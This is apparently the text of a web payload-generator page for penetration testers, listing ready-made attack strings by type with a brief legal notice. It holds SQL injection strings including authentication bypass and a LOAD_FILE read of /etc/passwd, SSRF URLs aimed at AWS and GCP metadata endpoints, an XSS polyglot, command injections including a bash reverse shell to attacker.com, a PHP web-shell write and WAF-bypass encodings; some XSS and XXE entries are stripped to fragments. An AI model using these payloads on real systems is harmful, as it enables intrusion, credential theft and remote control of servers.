💣 Payload Generator
Generate and customize attack payloads for various vulnerability types. Select vulnerability type, encoding options, and context to generate targeted payloads.
Legal Notice: Only use these payloads in authorized penetration tests or security assessments with explicit permission. Unauthorized use is illegal.
⚙️ Generate Payloads
Generated Payload
Select options and click Generate to create a payload...
All
SQLi
XSS
SSRF
XXE
Command
WAF Bypass
SQLi - Basic Detection
'
SQLi - Auth Bypass
admin'--
SQLi - Union Select
' UNION SELECT NULL--
SQLi - Time-Based (MySQL)
' AND SLEEP(5)--
SQLi - File Read (MySQL)
' UNION SELECT LOAD_FILE('/etc/passwd')--
XSS - Basic Script
XSS - Image Onerror
XSS - SVG Onload
XSS - Cookie Steal
XSS - Polyglot
javascript:/*-->x" onmouseover=alert(1)//>
SSRF - Localhost
http://localhost/
SSRF - AWS Metadata
http://169.254.169.254/latest/meta-data/
SSRF - IPv6 Localhost
http://[::1]:8080/
SSRF - GCP Metadata
http://metadata.google.internal/computeMetadata/v1/
XXE - File Read
]>
XXE - Blind SSRF
]>
XXE - Billion Laughs
]>
Command - Ping
; ping -c 3 attacker.com
Command - Reverse Shell
; bash -i >& /dev/tcp/attacker.com/4444 0>&1
Command - File Write
; echo '' > shell.php
WAF - Comment Obfuscation
UN/**/ION SEL/**/ECT
WAF - Case Variation
WAF - Double URL Encode
%2527 (single quote)
Pro Tips:
Back to Home
- Test payloads in isolated environments first
- Combine multiple encoding techniques for WAF bypass
- Use Burp Suite's Intruder for automated payload testing
- Check specific framework documentation for targeted payloads